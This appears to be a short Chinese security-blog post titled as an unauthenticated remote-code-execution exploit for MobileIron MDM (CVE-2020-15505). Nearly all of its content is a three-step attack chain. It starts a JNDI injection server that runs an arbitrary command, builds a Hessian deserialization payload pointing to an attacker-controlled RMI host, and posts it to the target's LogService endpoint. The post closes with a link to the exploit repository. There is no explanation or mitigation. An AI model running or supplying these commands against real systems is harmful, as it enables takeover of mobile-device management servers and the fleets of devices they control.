MobileIron MDM 未授权RCE EXP

  • A+
所属分类:安全文章

MOBILEIRON MDM 未授权RCE EXP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService

MobileIron MDM 未授权RCE EXP

MobileIron MDM 未授权RCE EXP


https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: